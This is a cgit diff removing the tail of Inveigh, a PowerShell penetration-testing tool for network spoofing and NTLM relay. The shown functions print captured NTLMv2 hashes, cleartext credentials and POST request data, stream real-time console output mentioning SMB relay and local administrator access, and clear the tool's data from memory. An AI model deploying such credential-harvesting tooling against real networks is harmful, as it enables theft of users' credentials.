- Write-Output $inveigh.NTLMv2_list
-}
-
-if($NTLMv2Unique)
-{
- $inveigh.NTLMv2_list.Sort()
-
- foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
- {
- $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
-
- if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
- {
- Write-Output $unique_NTLMv2
- }
-
- $unique_NTLMv2_account_last = $unique_NTLMv2_account
- }
-
-}
-
-if($NTLMv2Usernames)
-{
- Write-Output $inveigh.NTLMv2_username_list
-}
-
-if($Cleartext)
-{
- Write-Output $inveigh.cleartext_list
-}
-
-if($CleartextUnique)
-{
- Write-Output $inveigh.cleartext_list | Get-Unique
-}
-
-if($POSTRequest)
-{
- Write-Output $inveigh.POST_request_list
-}
-
-if($POSTRequestUnique)
-{
- Write-Output $inveigh.POST_request_list | Get-Unique
-}
-
-if($Learning)
-{
- Write-Output $inveigh.valid_host_list
-}
-
-}
-
-function Watch-Inveigh
-{
-<#
-.SYNOPSIS
-Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell.
-
-.PARAMETER ConsoleOutput
-(Medium,Low) Medium and Low can be used to reduce output.
-#>
-
-[CmdletBinding()]
-param
-(
- [parameter(Mandatory=$false)][ValidateSet("Low","Medium")][String]$ConsoleOutput = "Y",
- [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
-)
-
-if($inveigh.tool -ne 1)
-{
-
- if($inveigh.running -or $inveigh.relay_running)
- {
- Write-Output "Press any key to stop real time console output"
- $inveigh.console_output = $true
-
- :console_loop while((($inveigh.running -or $inveigh.relay_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
- {
-
- while($inveigh.console_queue.Count -gt 0)
- {
-
- switch -wildcard ($inveigh.console_queue[0])
- {
-
- {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
-
- {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
- {
-
- if($ConsoleOutput -eq 'Y')
- {
- Write-Output $inveigh.console_queue[0]
- }
-
- $inveigh.console_queue.RemoveAt(0)
-
- }
-
- {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
- {
-
- if($ConsoleOutput -ne "Low")
- {
- Write-Output $inveigh.console_queue[0]
- }
-
- $inveigh.console_queue.RemoveAt(0)
-
- }
-
- default
- {
- Write-Output $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
-
- }
-
- }
-
- if([Console]::KeyAvailable)
- {
- $inveigh.console_output = $false
- BREAK console_loop
- }
-
- Start-Sleep -m 5
- }
-
- }
- else
- {
- Write-Output "Inveigh isn't running"
- }
-
-}
-else
-{
- Write-Output "Watch-Inveigh cannot be used with current external tool selection"
-}
-
-}
-
-function Clear-Inveigh
-{
-<#
-.SYNOPSIS
-Clear-Inveigh will clear Inveigh data from memory.
-#>
-
-if($inveigh)
-{
-
- if(!$inveigh.running -and !$inveigh.relay_running)
- {
- Remove-Variable inveigh -scope global
- Write-Output "Inveigh data has been cleared from memory"
- }
- else
- {
- Write-Output "Run Stop-Inveigh before running Clear-Inveigh"
- }
-
-}
-
-} \ No newline at end of file
generated by cgit v1.2.3 (git 2.39.1) at 2025-05-25 19:55:20 +0000